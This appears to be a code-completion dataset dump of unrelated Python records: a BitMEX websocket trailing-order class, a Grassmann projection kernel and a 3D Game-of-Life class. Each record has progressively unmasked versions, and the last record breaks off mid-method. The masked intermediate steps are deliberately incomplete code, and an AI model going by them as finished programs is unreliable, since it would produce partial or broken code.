matching_instruments = [i for i in instruments if i['symbol'] == symbol]
if len(matching_instruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matching_instruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def calculate_new_price(self, extremum) -> float:
if self.order.side == 'Sell':
needed_price = extremum * (1 - self.offset / 100)
else:
needed_price = extremum * (1 + self.offset / 100)
needed_price = to_nearest(needed_price, tickSize=self.tick_size)
return needed_price
@property
def min_price(self):
return self._min_price
@min_price.setter
def min_price(self, value):
if value < self.initial_price:
new_price = self.calculate_new_price(value)
self.order.move(to=new_price)
self._min_price = value
@property
def max_price(self):
return self._max_price
@max_price.setter
def max_price(self, value):
if value > self.initial_price:
new_price = self.calculate_new_price(value)
self.order.move(to=new_price)
self._max_price = value
def stop_trailing(self):
self.tracking = False
def start_trailing(self, initial_price: float):
"""
:param initial_price: the price after reaching which order will be moving
"""
self._max_price = -1
self._min_price = float('inf')
self.initial_price = initial_price
self.tracking = True
def connect(self):
"""Connect to the websocket and initialize data stores."""
symbol = self.order.symbol
if self.test:
host = 'wss://testnet.bitmex.com/realtime'
else:
host = 'wss://bitmex.com/realtime'
# Get WS URL and connect.
endpoint = f"realtime?subscribe=instrument:{symbol}"
ws_url = host + endpoint
self.__connect(ws_url)
# Connected. Wait for partials
self.__wait_for_symbol()
def __connect(self, ws_url):
self.ws = websocket.WebSocketApp(ws_url,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=[])
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.exit()
def __wait_for_symbol(self):
while not {'instrument'} <= set(self.data):
sleep(0.1)
def __on_message(self, message):
"""Handler for parsing WS messages."""
message = json.loads(message)
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
if 'subscribe' in message:
if not message['success']:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > TrailingShell.MAX_TABLE_LEN:
self.data[table] = self.data[table][(TrailingShell.MAX_TABLE_LEN // 2):]
elif action == 'update':
# Locate the item in the collection and update it.
for updateData in message['data']:
item = find_item_by_keys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
# if table == 'order' and item['leavesQty'] <= 0:
# self.data[table].remove(item)
elif action == 'delete':
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = find_item_by_keys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
instrument = self.get_instrument(symbol=self.order.symbol)
if instrument is not None:
self.last_price = instrument['lastPrice']
if self.tracking:
if self.last_price > self.max_price and self.order.side == 'Sell':
self.max_price = self.last_price
elif self.last_price < self.min_price and self.order.side == 'Buy':
self.min_price = self.last_price
def __on_close(self):
self.exit()
def __on_open(self):
pass
def __on_error(self, error):
if not self.exited:
self.error(error)
def error(self, err):
self.exit()
|
normal
|
{
"blob_id": "ea4ec2e605ab6e8734f7631fe298c93467908b5f",
"index": 9582,
"step-1": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n <mask token>\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n <mask token>\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-2": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n <mask token>\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-3": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n <mask token>\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n <mask token>\n <mask token>\n\n def __on_open(self):\n pass\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-4": "<mask token>\n\n\nclass TrailingShell:\n <mask token>\n\n def __init__(self, order, offset: int, tick_size: float, test=True,\n init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n self.order = order\n self.offset = offset\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n self.initial_price = float('nan')\n self.tracking = False\n self.ws = None\n self.__reset()\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol\n ]\n if len(matching_instruments) == 0:\n raise Exception(\n 'Unable to find instrument or index with symbol: ' + symbol)\n instrument = matching_instruments[0]\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])\n ).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) ->float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n\n @property\n def max_price(self):\n return self._max_price\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n <mask token>\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n symbol = self.order.symbol\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n endpoint = f'realtime?subscribe=instrument:{symbol}'\n ws_url = host + endpoint\n self.__connect(ws_url)\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url, on_message=self.\n __on_message, on_close=self.__on_close, on_open=self.__on_open,\n on_error=self.__on_error, header=[])\n self.wst = threading.Thread(target=lambda : self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected\n ) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout or self._error:\n self.exit()\n <mask token>\n\n def __on_message(self, message):\n \"\"\"Handler for parsing WS messages.\"\"\"\n message = json.loads(message)\n table = message['table'] if 'table' in message else None\n action = message['action'] if 'action' in message else None\n if 'subscribe' in message:\n if not message['success']:\n self.error(\n 'Unable to subscribe to %s. Error: \"%s\" Please check and restart.'\n % (message['request']['args'][0], message['error']))\n elif 'status' in message:\n if message['status'] == 400:\n self.error(message['error'])\n if message['status'] == 401:\n self.error('API Key incorrect, please check and restart.')\n elif action:\n if table not in self.data:\n self.data[table] = []\n if table not in self.keys:\n self.keys[table] = []\n if action == 'partial':\n self.data[table] += message['data']\n self.keys[table] = message['keys']\n elif action == 'insert':\n self.data[table] += message['data']\n if table not in ['order', 'orderBookL2'] and len(self.data[\n table]) > TrailingShell.MAX_TABLE_LEN:\n self.data[table] = self.data[table][TrailingShell.\n MAX_TABLE_LEN // 2:]\n elif action == 'update':\n for updateData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[\n table], updateData)\n if not item:\n continue\n item.update(updateData)\n elif action == 'delete':\n for deleteData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[\n table], deleteData)\n self.data[table].remove(item)\n else:\n raise Exception('Unknown action: %s' % action)\n instrument = self.get_instrument(symbol=self.order.symbol)\n if instrument is not None:\n self.last_price = instrument['lastPrice']\n if self.tracking:\n if (self.last_price > self.max_price and self.order.side ==\n 'Sell'):\n self.max_price = self.last_price\n elif self.last_price < self.min_price and self.order.side == 'Buy':\n self.min_price = self.last_price\n <mask token>\n\n def __on_open(self):\n pass\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-5": "import json\nimport decimal\nimport threading\nimport websocket\nfrom time import sleep\nfrom supervisor.core.utils.math import to_nearest\n\n\ndef find_item_by_keys(keys, table, match_data):\n for item in table:\n matched = True\n for key in keys:\n if item[key] != match_data[key]:\n matched = False\n if matched:\n return item\n\n\nclass TrailingShell:\n # Don't grow a table larger than this amount. Helps cap memory usage.\n MAX_TABLE_LEN = 200\n\n def __init__(self, order, offset: int, tick_size: float, test=True, init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n\n self.order = order\n self.offset = offset\n\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n\n self.initial_price = float('nan')\n\n self.tracking = False\n self.ws = None\n\n self.__reset()\n\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol]\n if len(matching_instruments) == 0:\n raise Exception(\"Unable to find instrument or index with symbol: \" + symbol)\n instrument = matching_instruments[0]\n # Turn the 'tickSize' into 'tickLog' for use in rounding\n # http://stackoverflow.com/a/6190291/832202\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) -> float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n\n @property\n def max_price(self):\n return self._max_price\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n\n def stop_trailing(self):\n self.tracking = False\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n\n symbol = self.order.symbol\n\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n # Get WS URL and connect.\n endpoint = f\"realtime?subscribe=instrument:{symbol}\"\n ws_url = host + endpoint\n self.__connect(ws_url)\n\n # Connected. Wait for partials\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url,\n on_message=self.__on_message,\n on_close=self.__on_close,\n on_open=self.__on_open,\n on_error=self.__on_error,\n header=[])\n\n self.wst = threading.Thread(target=lambda: self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n\n # Wait for connect before continuing\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n\n if not conn_timeout or self._error:\n self.exit()\n\n def __wait_for_symbol(self):\n while not {'instrument'} <= set(self.data):\n sleep(0.1)\n\n def __on_message(self, message):\n \"\"\"Handler for parsing WS messages.\"\"\"\n\n message = json.loads(message)\n\n table = message['table'] if 'table' in message else None\n action = message['action'] if 'action' in message else None\n\n if 'subscribe' in message:\n if not message['success']:\n self.error(\"Unable to subscribe to %s. Error: \\\"%s\\\" Please check and restart.\" %\n (message['request']['args'][0], message['error']))\n elif 'status' in message:\n if message['status'] == 400:\n self.error(message['error'])\n if message['status'] == 401:\n self.error(\"API Key incorrect, please check and restart.\")\n elif action:\n\n if table not in self.data:\n self.data[table] = []\n\n if table not in self.keys:\n self.keys[table] = []\n\n # There are four possible actions from the WS:\n # 'partial' - full table image\n # 'insert' - new row\n # 'update' - update row\n # 'delete' - delete row\n if action == 'partial':\n self.data[table] += message['data']\n # Keys are communicated on partials to let you know how to uniquely identify\n # an item. We use it for updates.\n self.keys[table] = message['keys']\n elif action == 'insert':\n self.data[table] += message['data']\n\n # Limit the max length of the table to avoid excessive memory usage.\n # Don't trim orders because we'll lose valuable state if we do.\n if table not in ['order', 'orderBookL2'] and len(self.data[table]) > TrailingShell.MAX_TABLE_LEN:\n self.data[table] = self.data[table][(TrailingShell.MAX_TABLE_LEN // 2):]\n\n elif action == 'update':\n # Locate the item in the collection and update it.\n for updateData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[table], updateData)\n if not item:\n continue # No item found to update. Could happen before push\n\n # Update this item.\n item.update(updateData)\n\n # Remove canceled / filled orders\n # if table == 'order' and item['leavesQty'] <= 0:\n # self.data[table].remove(item)\n\n elif action == 'delete':\n # Locate the item in the collection and remove it.\n for deleteData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[table], deleteData)\n self.data[table].remove(item)\n else:\n raise Exception(\"Unknown action: %s\" % action)\n\n instrument = self.get_instrument(symbol=self.order.symbol)\n if instrument is not None:\n self.last_price = instrument['lastPrice']\n if self.tracking:\n if self.last_price > self.max_price and self.order.side == 'Sell':\n self.max_price = self.last_price\n elif self.last_price < self.min_price and self.order.side == 'Buy':\n self.min_price = self.last_price\n\n def __on_close(self):\n self.exit()\n\n def __on_open(self):\n pass\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-ids": [
14,
15,
16,
18,
25
]
}
|
[
14,
15,
16,
18,
25
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProjectionKernel(GrassmannianKernel):
<|reserved_special_token_0|>
def element_wise_operation(self, xi_j: Tuple) ->float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
:param xi_j: Tuple of orthonormal matrices representing the grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, 'fro')
return n * n
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProjectionKernel(GrassmannianKernel):
def __init__(self, kernel_parameter: Union[int, float]=None):
"""
:param kernel_parameter: Number of independent p-planes of each Grassmann point.
"""
super().__init__(kernel_parameter)
def element_wise_operation(self, xi_j: Tuple) ->float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
:param xi_j: Tuple of orthonormal matrices representing the grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, 'fro')
return n * n
<|reserved_special_token_1|>
from typing import Union, Tuple
import numpy as np
from UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel
class ProjectionKernel(GrassmannianKernel):
def __init__(self, kernel_parameter: Union[int, float]=None):
"""
:param kernel_parameter: Number of independent p-planes of each Grassmann point.
"""
super().__init__(kernel_parameter)
def element_wise_operation(self, xi_j: Tuple) ->float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
:param xi_j: Tuple of orthonormal matrices representing the grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, 'fro')
return n * n
<|reserved_special_token_1|>
from typing import Union, Tuple
import numpy as np
from UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel
class ProjectionKernel(GrassmannianKernel):
def __init__(self, kernel_parameter: Union[int, float] = None):
"""
:param kernel_parameter: Number of independent p-planes of each Grassmann point.
"""
super().__init__(kernel_parameter)
def element_wise_operation(self, xi_j: Tuple) -> float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
:param xi_j: Tuple of orthonormal matrices representing the grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, "fro")
return n * n
|
flexible
|
{
"blob_id": "14ce803e3deb529b489c150c7ecc702118448acb",
"index": 9022,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ProjectionKernel(GrassmannianKernel):\n <mask token>\n\n def element_wise_operation(self, xi_j: Tuple) ->float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, 'fro')\n return n * n\n",
"step-3": "<mask token>\n\n\nclass ProjectionKernel(GrassmannianKernel):\n\n def __init__(self, kernel_parameter: Union[int, float]=None):\n \"\"\"\n :param kernel_parameter: Number of independent p-planes of each Grassmann point.\n \"\"\"\n super().__init__(kernel_parameter)\n\n def element_wise_operation(self, xi_j: Tuple) ->float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, 'fro')\n return n * n\n",
"step-4": "from typing import Union, Tuple\nimport numpy as np\nfrom UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel\n\n\nclass ProjectionKernel(GrassmannianKernel):\n\n def __init__(self, kernel_parameter: Union[int, float]=None):\n \"\"\"\n :param kernel_parameter: Number of independent p-planes of each Grassmann point.\n \"\"\"\n super().__init__(kernel_parameter)\n\n def element_wise_operation(self, xi_j: Tuple) ->float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, 'fro')\n return n * n\n",
"step-5": "from typing import Union, Tuple\n\nimport numpy as np\n\nfrom UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel\n\n\nclass ProjectionKernel(GrassmannianKernel):\n\n def __init__(self, kernel_parameter: Union[int, float] = None):\n \"\"\"\n :param kernel_parameter: Number of independent p-planes of each Grassmann point.\n \"\"\"\n super().__init__(kernel_parameter)\n\n def element_wise_operation(self, xi_j: Tuple) -> float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, \"fro\")\n return n * n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
